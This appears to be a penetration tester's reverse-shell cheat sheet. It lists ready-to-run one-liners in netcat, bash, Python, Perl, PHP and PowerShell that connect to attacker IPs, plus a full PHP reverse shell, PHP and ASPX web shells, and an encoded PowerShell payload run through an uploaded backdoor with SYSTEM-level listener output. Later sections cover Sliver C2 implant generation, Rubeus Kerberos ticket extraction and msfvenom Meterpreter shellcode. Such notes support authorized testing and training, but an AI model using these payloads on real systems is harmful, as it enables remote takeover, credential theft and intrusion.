CheatSheet

Reverse Shells

Enumeration and privilege escalation techniques for various systems.

Reverse Shells

Helpful Links:

Kali Linux Specific Local Repositories:

Web Shells:

/usr/share/webshells

Powercat (Powershell Version of NetCat):

/usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1

Netcat

Code

nc -e /bin/sh 192.168.45.215 443
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.45.215 443 >/tmp/f

Named Pipe Loop with Netcat

Code

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.45.215 443 > /tmp/f

Busybox Netcat

Code

busybox nc 192.168.45.215 443 -e /bin/sh

Java

Code

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

XTerm

Code

xterm -display 10.0.0.1:1
Xnest :1
xhost +targetip

Bash Shell

Code

/bin/bash -c "/bin/bash -i >& /dev/tcp/192.168.45.215/443 0>&1"
/usr/bin/bash -i >& /dev/tcp/192.168.45.215/443 0>&1

Python2 Reverse Shells

Code

import socket
from subprocess import call
from os import dup2

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.27",1234))
dup2(s.fileno(),0)
dup2(s.fileno(),1)
dup2(s.fileno(),2)
call(["/bin/bash","-i"])
python -c 'import socket; from subprocess import call; from os import dup2;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.215",443)); dup2(s.fileno(),0); dup2(s.fileno(),1); dup2(s.fileno(),2);call(["/bin/bash","-i"])'

Python3 Reverse Shells

Code

import socket, subprocess

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.27",1234))
subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())
python -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.243",1234));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())'

Python Shell Using Sudo

Code

sudo -i -u scriptmanager python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.34",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

Perl

Code

perl -e 'use Socket;$i="192.168.45.243";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

PHP Script

Code

php -r '$sock=fsockopen("192.168.45.243",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

URL_Shell.php

Code

<?php
system($_REQUEST['cmd']);
?>

PHP Reverse Shell

Code

<?php

set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.14.27';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

//
// Daemonise ourself if possible to avoid zombies later
//

// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies.  Worth a try...
if (function_exists('pcntl_fork')) {
	// Fork and have the parent process exit
	$pid = pcntl_fork();
	
	if ($pid == -1) {
		printit("ERROR: Can't fork");
		exit(1);
	}
	
	if ($pid) {
		exit(0);  // Parent exits
	}

	// Make the current process a session leader
	// Will only succeed if we forked
	if (posix_setsid() == -1) {
		printit("Error: Can't setsid()");
		exit(1);
	}

	$daemon = 1;
} else {
	printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

// Change to a safe directory
chdir("/");

// Remove any umask we inherited
umask(0);

//
// Do the reverse shell...
//

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
	printit("$errstr ($errno)");
	exit(1);
}

// Spawn shell process
$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
	printit("ERROR: Can't spawn shell");
	exit(1);
}

// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
	// Check for end of TCP connection
	if (feof($sock)) {
		printit("ERROR: Shell connection terminated");
		break;
	}

	// Check for end of STDOUT
	if (feof($pipes[1])) {
		printit("ERROR: Shell process terminated");
		break;
	}

	// Wait until a command is end down $sock, or some
	// command output is available on STDOUT or STDERR
	$read_a = array($sock, $pipes[1], $pipes[2]);
	$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

	// If we can read from the TCP socket, send
	// data to process's STDIN
	if (in_array($sock, $read_a)) {
		if ($debug) printit("SOCK READ");
		$input = fread($sock, $chunk_size);
		if ($debug) printit("SOCK: $input");
		fwrite($pipes[0], $input);
	}

	// If we can read from the process's STDOUT
	// send data down tcp connection
	if (in_array($pipes[1], $read_a)) {
		if ($debug) printit("STDOUT READ");
		$input = fread($pipes[1], $chunk_size);
		if ($debug) printit("STDOUT: $input");
		fwrite($sock, $input);
	}

	// If we can read from the process's STDERR
	// send data down tcp connection
	if (in_array($pipes[2], $read_a)) {
		if ($debug) printit("STDERR READ");
		$input = fread($pipes[2], $chunk_size);
		if ($debug) printit("STDERR: $input");
		fwrite($sock, $input);
	}
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
	if (!$daemon) {
		print "$string\n";
	}
}

?>

Shell.aspx

Code

<%@Page Language="C#"%><%var p=new System.Diagnostics.Process{StartInfo=
{FileName=Request["c"],UseShellExecute=false,RedirectStandardOutput=true}};p.Start();%>
<%=p.StandardOutput.ReadToEnd()%>

Powershell One-Liner

Code

$client = New-Object System.Net.Sockets.TCPClient('192.168.45.243',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Encoding Powershell One-Liner to Execute in Web Shell

pwsh
$Text = '$client = New-Object System.Net.Sockets.TCPClient("192.168.45.215",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
$EncodedText =[Convert]::ToBase64String($Bytes)
$EncodedText
JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADQANQAuADIANAAzACIALAAxADIAMwA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==
powershell -enc JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADQANQAuADIANAAzACIALAAxADIAMwA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==

Example of Executing in Shell via Previous Malicious File Upload

curl http://192.168.50.189/meteor/uploads/simple-backdoor.pHP?cmd=powershell%20-enc%20JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0
...
AYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA
kali@kali:~$ nc -nvlp 4444
listening on [any] 4444 ...
connect to [192.168.119.3] from (UNKNOWN) [192.168.50.189] 50603
ipconfig

Windows IP Configuration

Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.50.189
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.50.254

PS C:\xampp\htdocs\meteor\uploads> whoami
nt authority\system

Creating and Executing Reverse Shell with Sliver C2 Framework

Installing Sliver

sudo curl https://sliver.sh/install|sudo bash

Starting Sliver Service

systemctl start sliver.service

Running Sliver

sliver

Generating Reverse Shell Executable

generate --arch 64bit --os windows --mtls 10.10.16.12 --reconnect 60 --save shell.exe

Starting `mTLS` Server

mtls

Interacting with New Session

sessions -i <session_id>

Starting Socks5 Server

socks5 start
[*] Started SOCKS5 127.0.0.1 1081  
⚠  In-band SOCKS proxies can be a little unstable depending on protocol

Uploading `shell.aspx` to Development Directory

cd C:\inetpub\development
upload shell.aspx

Installing Rubeus Module in Sliver

armory install rubeus
[*] Installing alias 'Rubeus' (v0.0.25) ... done!

Executing Rubeus

rubeus tgtdeleg /nowrap
[*] rubeus output:

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.2 

[*] Action: Request Fake Delegation TGT (current user)

[*] No target SPN specified, attempting to build 'cifs/dc.domain.com'
[*] Initializing Kerberos GSS-API w/ fake delegation for target 'cifs/g0.flight.htb'
[+] Kerberos GSS-API initialization success!
[+] Delegation requset success! AP-REQ delegation ticket is now in GSS-API output.
[*] Found the AP-REQ delegation ticket in the GSS-API output.
[*] Authenticator etype: aes256_cts_hmac_sha1
[*] Extracted the service ticket session key from the ticket cache: lE6qVlr6UyAmBEAMEF8aFC9UVzE9UXfz5D/xdtbM5nw=
[+] Successfully decrypted the authenticator
[*] base64(ticket.kirbi):

      doIFVDCCBVCgAwIBBaEDAgEWooIEZDCCBGBhggRcMIIEWKADAgEFoQwbCkZMSUdIVC5IVEKiHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCkZMSUdIVC5IVEKjggQgMIIEHKADAgESoQMCAQKiggQOBIIECqumSf/sQYtU5TZKjiVC1b0rcsivQ2a/Jphie//X0Yu5ld5QYioSx5ACvJcY1Bp3r50An7ZSvEOCyvJixBjzbYK8Rv8QKmzUGk6H+RUm+yw31xKXCVKi6IfmpfxpMoWtj1jicGP64n6inv7V+9U0313gxH/hJtOcTQk+kqmQ86pbxrhDxWVNQAm3fXyf61aVJyuMaVMWlCOblOZfvunMbmWoIHJ5Cv4ZogdjYO+ELM3w+Z4t0foabYTeGVlNZiD5hK8N+IF8RXOBvcaiScmFh51hJxUmNjfO3pqzyoIYboVRorB4QqqAXk7ORcmP6Q3fz+UDlSr7CTM9WIUChaY8A6l8kH3IwsnfX+pMpDbdLLYbAGY1NAbMpdetpcKGq6yO+knIw6/89vMQGD2mHxnNWtES6M2ZltNn98D3qeo1FdCE3EkZkHCxGtnopuJ0rTO+I/t6Rm5BqMKU5a6GVBCDejJAKG8k5iG9Qhv/8wPug/bJeYQ938mCGTdX+V5GBJw298Kf27wdegpo9g9I7Q23EhqV16/6akw57X7Tp6yRGsR7QuQBnEaRB7ualOXk/cKQgzBtd4XzhPnMtA1P83nURaldabYHIhYBfhw8YnevPvfnscAk5H7ymArykBi03hYWkRNjqyq48g/bWTnjyrQW1ui40rYvh7009Aw6TA1JFwOGHFT+4//XS9Uxt7u66Tvbb6uopL28np4KpZeg/odHGxATNCjZZHJXagdqMIfC2UEGRYFQlhnr/UX/c6LI0ud2Df6Hpcn+MEYk/J2B8IYDnooSfwz5UGz15Wwm0+Zkd8JbssQkahXfFbUXy5/SW2sC0jBsPjJ7xZqAH/+0Z+oP9zpD/dNJxerGKQjcy9Za7yUI1F8GzkWb7AWFHsThUps0jGUkp6GbKlr2+xeOPtoJ980ow3Xr8MkIKLMd/GZZu3YiGEGN/dXd2lKHkNURFBk7t03/KCVn+GWDe47XH3G/nuXW2irTCpnYG0jX0bBftpk55B2+/nXXWcSMdz9K0JKy/irhzVh3nw5LgSyHzvk3w8O36KeSGmYnOuK2UDZney09r0lboyp5FAuOGN/vhkjDvBALC6+g2oyLQVGDB4mbIxSU+F8E/0pCR4FD1Au3f58UVanesDRDrRjvxP4Qv8hMtZhsXYIyxm1MAy6PJ+bEqSojOYIBUzr4M7Owrp0ehw5h1a1gJK2MrkwOP/ubB3OhK40lUjzzs1lazFn4aZuI3QPpxkavbZr9CItxScVckJdBEmSx5BZPlq77+BnSXNmaGJ5NAjAKizqCJPvZJzvqUdI4wR42iX1IVmV9sDY/nDLwDGLQmMJJuhQINzJ8nixkvduGpzmR4TmNzY2d9u3RiVs4ouNVx4MhAyPNo4HbMIHYoAMCAQCigdAEgc19gcowgceggcQwgcEwgb6gKzApoAMCARKhIgQgpp/w4fCWVBTGpP5UapXvZEEu44lbtzwANBFp8rr62QehDBsKRkxJR0hULkhUQqIQMA6gAwIBAaEHMAUbA0cwJKMHAwUAYKEAAKURGA8yMDI1MDUyMDA5NDIxMFqmERgPMjAyNTA1MjAxOTQyMDlapxEYDzIwMjUwNTI3MDk0MjA5WqgMGwpGTElHSFQuSFRCqR8wHaADAgECoRYwFBsGa3JidGd0GwpGTElHSFQuSFRC

Creating Reverse Shell with Metasploit

Start Metasploit

msfconsole

Shell Module

use /exploit/script/web_delivery

Configure Options

set options
lhost <attacker IP>
srvhost <attacker IP>
lport <port>
set target <scripting languages listed above>
set payload windows/meterpreter/reverse_tcp
run

MSFVENOM

Shellcode Generate

msfvenom -p windows/meterpreter/reverse_tcp  LHOST=192.168.45.197 LPORT=1234 -f python -b "\x00\x20" -v shellcode

Shellcode Generate (with automatic retry)

msfvenom -p windows/meterpreter/reverse_tcp  LHOST=192.168.45.197 LPORT=1234 EXITFUNC=seh -f python -b "\x00\x20" -v shellcode

Catching a Meterpreter Shell

Code

use windows/meterpreter/reverse_tcp
set lhost tun0
set lport 1234
set payload windows/meterpreter/reverse_tcp